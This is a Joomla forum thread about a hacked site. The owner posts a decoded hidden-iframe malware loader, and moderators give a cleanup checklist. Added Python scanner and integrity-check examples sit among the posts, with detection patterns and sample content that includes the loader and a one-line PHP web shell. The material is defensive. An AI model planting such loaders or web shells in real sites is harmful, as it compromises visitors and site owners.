The Joomla! Forum ™



PostPosted: Tue Aug 07, 2012 6:49 am 
Joomla! Apprentice

Joined: Thu Sep 30, 2010 1:35 pm
Posts: 14
Hi guys!

I recently noticed that Avira gave me a warning on my site in IE. I went around and searched for suspicious code.

When indexing my front page, I found this at the very top of the page:

It's a JavaScript, and my friend helped me decode it. Then it turned out like this:

Code:
// Decoded loader: creates an <iframe>, parks it far off-screen so the visitor
// never sees it, and points it at the attacker's page. Behaviour unchanged;
// comments added for readability.
function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';      // thousands of em above and left of the viewport
    ifrm.style.left = '-999em';
    ifrm.src = "http://xxxxx.net/xml.php";   // hostname redacted by the poster
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm); // loads on every page that includes this script
}


How the h***, I first thought. Where can the file be that adds this code to my index, and to all pages for that matter? Where do I start to search? I guess it's one file pretending to be a "plugin" that adds the code to all the pages when run?

Please help=)

My site is: http://www.tuaagder. no


Last edited by mandville on Tue Aug 07, 2012 8:26 am, edited 3 times in total.
Hacker script has been removed - broke link. Do not post full hacker code or the full site link, as users may follow it.


PostPosted: Tue Aug 07, 2012 8:26 am 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11644
Location: The Girly Side of Joomla in Sussex
[ ] Download and RUN the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Post the generated results in your security/been hacked topic.

[ ] Ensure you have the latest version of Joomla for your 1.5 or 2.5 version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review the Vulnerable Extensions List to check whether any 3rd party extension versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, viruses, trojans, spyware, etc. Checklist 7 contains a list of recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla files that will be placed back on the website (such as, but not limited to, images, PDF files, files for download, and other documents and files) are valid and are supposed to be part of your website.

[ ] Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory) you downloaded earlier. Install freshly downloaded copies of any extensions and templates used on the site. If the Joomla database user name and password were changed earlier, then make the necessary changes to the configuration.php file and upload a copy to the website. Upload any non-Joomla files that are necessary for your website. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories. More detailed information can be found in the Security Checklist 7.

_________________
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
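The checklist above tells you what to look for but not how to find it in a few thousand files. The script below is an added example (written for this page, not code from the thread, from Joomla or from the Forum Post Assistant): it walks a webroot and reports files whose contents match the decoded loader from the first post (an iframe created by script and pushed hundreds of em off-screen), files wrapping base64 in eval(), long String.fromCharCode blobs, and anything left world-writable (the 777 case in the checklist). The three indicator patterns are assumptions chosen to match this thread, not an exhaustive malware signature set; the sample webroot it builds is constructed in a temporary directory so the script runs offline.

```python
"""Triage a Joomla webroot for the injected loader in the first post and for
world-writable files. Added example; all paths and sample contents are constructed."""
import os
import re
import stat
import tempfile

# Text file types that can carry injected script or a PHP backdoor.
SCAN_EXT = {".php", ".js", ".html", ".htm", ".txt", ".ini"}


def _hidden_iframe(text):
    # Loader pattern from the post: iframe created by script, then positioned
    # thousands of em/px off the visible page.
    return bool(re.search(r"createElement\(\s*['\"]iframe['\"]\s*\)", text)
                and re.search(r"['\"]-\d{3,}(?:em|px)['\"]", text))


def _eval_base64(text):
    # eval() around base64_decode(), optionally via gzinflate/str_rot13.
    return re.search(
        r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\(",
        text) is not None


def _fromcharcode_blob(text):
    # A long String.fromCharCode(n, n, n, ...) literal: hand-decoded in the thread.
    return re.search(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){20,}", text) is not None


INDICATORS = [
    ("hidden_iframe", _hidden_iframe),
    ("eval_base64", _eval_base64),
    ("fromcharcode_blob", _fromcharcode_blob),
]


def file_indicators(path):
    """Names of every indicator matching the file's contents."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    return [name for name, check in INDICATORS if check(text)]


def world_writable(path):
    """True if 'other' may write (the 777 case from the checklist)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def scan_tree(root):
    """Report every file or directory under root that is world-writable or whose
    contents match an indicator. Keys are forward-slash relative paths."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            if world_writable(full):
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = {"indicators": [], "world_writable": True}
        for name in filenames:
            full = os.path.join(dirpath, name)
            scannable = os.path.splitext(name)[1] in SCAN_EXT or name == ".htaccess"
            hits = file_indicators(full) if scannable else []
            ww = world_writable(full)
            if hits or ww:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = {"indicators": hits, "world_writable": ww}
    return findings


def build_demo_site():
    """Constructed stand-in for a compromised webroot: clean index, a template
    with the posted loader injected, and a dropped PHP file in cache/ left 777."""
    root = tempfile.mkdtemp(prefix="joomla-demo-")
    loader = ("<script>\nfunction frmAdd() {\n"
              "var ifrm = document.createElement('iframe');\n"
              "ifrm.style.position='absolute';\n"
              "ifrm.style.top='-999em';\nifrm.style.left='-999em';\n"
              "ifrm.src = \"http://xxxxx.net/xml.php\";\n"
              "ifrm.id = 'frmId';\ndocument.body.appendChild(ifrm);\n}\n</script>\n")
    files = {
        "index.php": b"<?php define('_JEXEC', 1); require 'includes/framework.php'; ?>\n",
        "templates/rhuk_milkyway/index.php": (loader + "<html><body>template</body></html>\n").encode(),
        "cache/.sys.php": b"<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>\n",  # decodes to phpinfo();
        "images/logo.png": b"\x89PNG\r\n\x1a\n",
    }
    for rel, data in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), mode=0o755, exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
        os.chmod(full, 0o644)                                      # checklist's file mode
    os.chmod(os.path.join(root, "cache", ".sys.php"), 0o777)       # the forbidden mode
    return root


if __name__ == "__main__":
    for rel, info in sorted(scan_tree(build_demo_site()).items()):
        print(f"{rel}: indicators={info['indicators']} world_writable={info['world_writable']}")
```

Run it against the real document root instead of the demo tree by calling scan_tree("/home/.../www") and treat every hit as something to read by hand, not as proof of cleanliness: a clean report only means none of these three patterns matched, which is exactly why the checklist still says to replace all files rather than grep and patch.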


PostPosted: Tue Aug 07, 2012 2:34 pm 
Joomla! Explorer

Joined: Sat Aug 13, 2011 6:27 am
Posts: 301
I checked your site here and it reported malware, which you already know. This is what Sucuri reported for your site:

malware-entry-mwexploitkitblackhole1

http://sitecheck.sucuri.net/scanner/


PostPosted: Wed Aug 08, 2012 6:39 am 
Joomla! Apprentice

Joined: Thu Sep 30, 2010 1:35 pm
Posts: 14
Yeah, I know =) Found that code :D But that was a good scanner, BTW!

BUT! My question is: how do I remove this code without reinstalling everything? We're looking at MANY hours of work for that to happen =) And how the h*** did he get in in the first place? =)

Thanks!


PostPosted: Wed Aug 08, 2012 6:56 am 
Joomla! Explorer

Joined: Sat Aug 13, 2011 6:27 am
Posts: 301
Do you have a backup of your files? It could be used, unless it is also infected. But here you will get the advice to download fresh, uninfected Joomla files and use them instead.

Sucuri has a cleaning service for malware, but it costs 90 USD; it lasts for a year, though. I guess your site then gets fixed directly, after a couple of hours.

To avoid situations like yours I use the security extension Eyesite, which detects changed or new files on the site.
http://www.lesarbresdesign.info/extensions/eyesite
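The file-change detection this post recommends comes down to a hash baseline of the webroot and a diff against it later. The script below is an added example (written for this page; it is not Eyesite's code and does not describe how Eyesite stores its data): it records a SHA-256 manifest of every file, keeps it outside the webroot, and reports files added, changed or removed. The demo site, the "compromise" it simulates and the file names are all constructed in temporary directories so it runs offline.

```python
"""Baseline-and-diff file integrity check for a Joomla webroot. Added example;
all paths and file contents are constructed for the demo."""
import hashlib
import json
import os
import tempfile


def file_sha256(path):
    """Stream the file through SHA-256 so large uploads are not read into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root (forward-slash relative path) to its digest.
    Nothing is excluded: cache/ and tmp/ churn, but they are also where droppers
    land, so filter known-noisy paths when reading the diff, not when baselining."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = file_sha256(full)
    return manifest


def save_manifest(manifest, path):
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def diff_manifests(baseline, current):
    """Sorted lists of files added, changed or removed since the baseline."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "changed": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "removed": sorted(p for p in baseline if p not in current),
    }


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)


def demo():
    """Baseline a constructed clean install, simulate the compromise from the
    thread (template edited, backdoor dropped, a file deleted), and diff."""
    root = tempfile.mkdtemp(prefix="joomla-fim-")
    # The manifest lives outside the webroot: whoever can write files there
    # could otherwise rewrite the baseline to hide their changes.
    store = tempfile.mkdtemp(prefix="joomla-fim-store-")
    baseline_path = os.path.join(store, "baseline.json")

    _write(root, "index.php", b"<?php define('_JEXEC', 1); ?>\n")
    _write(root, "htaccess.txt", b"RewriteEngine On\n")
    _write(root, "templates/rhuk_milkyway/index.php", b"<html><body>template</body></html>\n")
    _write(root, "images/stories/photo.jpg", b"\xff\xd8\xff\xe0")
    save_manifest(build_manifest(root), baseline_path)

    # Simulated compromise: injected loader, dropped backdoor, deleted file.
    _write(root, "templates/rhuk_milkyway/index.php",
           b"<script>function frmAdd(){/* hidden iframe loader */}</script>\n")
    _write(root, "images/stories/shell.php", b"<?php eval(base64_decode($_POST['c'])); ?>\n")
    os.remove(os.path.join(root, "htaccess.txt"))

    return diff_manifests(load_manifest(baseline_path), build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Two caveats a practitioner would want: the diff cannot tell a legitimate Joomla or extension update from an injection, so every "changed" entry is reviewed and the baseline is rebuilt only after an update you performed yourself; and a baseline taken on a site that is already compromised, as the one in this thread is, simply enshrines the backdoors, so the replace-all-files step comes first and the first manifest is taken from the fresh install.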


PostPosted: Wed Aug 08, 2012 8:42 am 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11644
Location: The Girly Side of Joomla in Sussex
MadSilence wrote:
Yeah I know=) And, How the H*** did he get in in the first time?=)

Follow the first line of the checklist, and it may help us judge.



PostPosted: Wed Aug 08, 2012 9:04 am 
Joomla! Apprentice

Joined: Thu Sep 30, 2010 1:35 pm
Posts: 14
FPA report:

Problem Description :: Forum Post Assistant (v1.2.1) : 8th August 2012 wrote:
iFrame virus
Forum Post Assistant (v1.2.1) : 8th August 2012 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 1.5.20-Stable (senu takaa) 18-July-2010
Joomla! Configured :: Yes | Writable (644) | Owner: tuaagder (uid: 59556/gid: 59556) | Group: tuaagder (gid: 59556) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-5-amd64 | Technology: x86_64 | Web Server: Apache/2.2.16 | Encoding: gzip,deflate,sdch | Doc Root: /home/1/t/tuaagder/www | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.3-7+squeeze13 | PHP API: cgi-fcgi | Session Path Writable: Unknown | Display Errors: | Error Reporting: 30711 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: /home/:/tmp/:/usr/lib/php5/:/usr/share/php:/usr/local/php5-suphp/:/usr/bin/:/usr/local/bin/:/bin/ | Uploads: 1 | Max. Upload Size: 128M | Max. POST Size: 128M | Max. Input Time: 60 | Max. Execution Time: 60 | Memory Limit: 256M

MySQL Configuration :: Version: 5.5.25-log (Client:5.1.63) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 670.61 KiB | #of _FPA_TABLE: 92
Detailed Environment :: wrote:
PHP Extensions :: Core (5.3.3-7+squeeze13) | date (5.3.3-7+squeeze13) | ereg () | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | bz2 () | calendar () | ctype () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gettext () | session () | iconv () | json (1.2.1) | mbstring () | standard (5.3.3-7+squeeze13) | posix () | Reflection ($Revision: 300393 $) | SPL (0.2) | shmop () | SimpleXML (0.1) | soap () | sockets () | Phar (2.0.1) | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.9.1) | cgi-fcgi () | ADOdb () | curl () | gd () | geoip (1.0.8) | idn () | imagick (3.0.1) | imap () | mcrypt () | mssql () | mysql (1.0) | mysqli (0.1) | odbc (1.0) | pam_auth (0.3) | PDO (1.0.4dev) | pdo_dblib (1.0.1) | pdo_mysql (1.0.2) | PDO_ODBC (1.0.1) | pdo_pgsql (1.0.2) | pdo_sqlite (1.0.1) | pgsql () | ps () | pspell () | recode () | SQLite (2.0-dev) | sqlite3 (0.7-dev) | suhosin (0.9.32.1) | svn (0.6.0-dev) | tidy (2.0) | xmlrpc (0.51) | xsl (0.1) | mhash () | Zend Engine (2.3.0) |
Potential Missing Extensions ::

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Extensions Discovered :: wrote:
Components :: SITE :: Wrapper (1.5.0) | User (1.5.0) | MailTo (1.5.0) |
Components :: ADMIN :: Messaging (1.5.0) | Cache Manager (1.5.0) | Akeeba (3.1) | Trash (1.0.0) | Configuration Manager (1.5.0) | FlipPhoto_Pro (1.0.3) | Content Page (1.5.0) | Search (1.5.0) | Newsfeeds (1.5.0) | Banners (1.5.0) | Media Manager (1.5.0) | JEvents (1.5.4a (b1785) | Control Panel (1.5.0) | Plugin Manager (1.5.0) | Template Manager (1.5.0) | Menus Manager (1.5.0) | Mass Mail (1.5.0) | User Manager (1.5.0) | Installation Manager (1.5.0) | JCE (1.5.7.4) | Contact Items (1.0.0) | Polls (1.5.0) | Module Manager (1.5.0) | Frontpage (1.5.0) | Language Manager (1.5.0) | Weblinks (1.5.0) |

Modules :: SITE :: Statistics (1.5.0) | Feed Display (1.5.0) | Newsflash (1.5.0) | Sections (1.5.0) | Menu (1.5.0) | Archived Content (1.5.0) | Search (1.0.0) | Banner (1.5.0) | Random Image (1.5.0) | Login (1.5.0) | Most Read Content (1.5.0) | Footer (1.5.0) | Syndicate (1.5.0) | Related Items (1.0.0) | Breadcrumbs (1.5.0) | Custom HTML (1.5.0) | Who\'s Online (1.0.0) | FlipPhoto Pro (1.0.3) | Poll (1.5.0) | Wrapper (1.0.0) | Latest News (1.5.0) |
Modules :: ADMIN :: Items Stats (1.0.0) | Logged in Users (1.0.0) | Feed Display (1.5.0) | Latest News (1.0.0) | Online Users (1.0.0) | Admin Submenu (1.0.0) | Login Form (1.0.0) | Popular Items (1.0.0) | Footer (1.0.0) | User Status (1.5.0) | Custom HTML (1.5.0) | Toolbar (1.0.0) | Title (1.0.0) | Admin Menu (1.0.0) | Quick Icons (1.0.0) | Unread Items (1.0.0) |

Plugins :: SITE :: Search - Sections (1.5) | Search - Categories (1.5) | Search - Contacts (1.5) | Search - Weblinks (1.5) | Search - Newsfeeds (1.5) | Search - Content (1.5) | Authentication - OpenID (1.5) | Authentication - Example (1.5) | Authentication - Joomla (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | User - Example (1.0) | User - Joomla! (1.5) | Content - Page Navigation (1.5) | Content - Example (1.0) | Content - Email Cloaking (1.5) | Content - Vote (1.5) | Admiror Gallery Engine (2.0 beta) | Content - ContentPassword (1.7.3) | AllVideos (by JoomlaWorks) (3.3) | Content - Load Modules (1.5) | Content - Pagebreak (1.5) | Content - Code Highlighter (Ge (1.5) | Button - Readmore (1.5) | Button - Image (1.0.0) | Button - Pagebreak (1.5) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | Editor - JCE 1.5.7.4 (1.5.7.4) | Editor - Xinha (1.5.1) | Editor - XStandard Lite for Jo (1.0) | Paste (1.5.7.4) | Paste (1.5.7.4) | Advanced Code Editor (1.5.7.4) | File Browser (1.5.7.4) | Image Manager (1.5.7.4) | Media Object support (1.5.7.4) | JCE SPELLCHECKER TITLE (1.5.7.4) | Joomla! Links for Advanced Lin (1.2.1) | Zoo2 Links for Advanced Link (1.0.0) | Advanced Link (1.5.7.4) | Editor - TinyMCE 3 (3.2.6) | JEvents - Record Event Attenda (0.4.2) | System - SEF (1.5) | System - Remember Me (1.5) | System - Debug (1.5) | System - Mootools Upgrade (1.5) | System - Log (1.5) | System - Backlinks (1.5) | System - Legacy (1.5) | System - Cache (1.5) |
Templates Discovered :: wrote:
Templates :: SITE :: rhuk_milkyway (1.0.2) | JA_Purity (1.2.0) | beez (1.0.0) | siteground-j15-38 (1.0.0) |
Templates :: ADMIN :: Khepri (1.0) |


PostPosted: Wed Aug 08, 2012 10:52 am 
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
Your Joomla is out of date; how many of the extensions are out of date?

You now need to delete all folders and files. Then do everything else in the list mandville posted.

_________________
http://weblinksonline.co.uk/joomla-faq.html

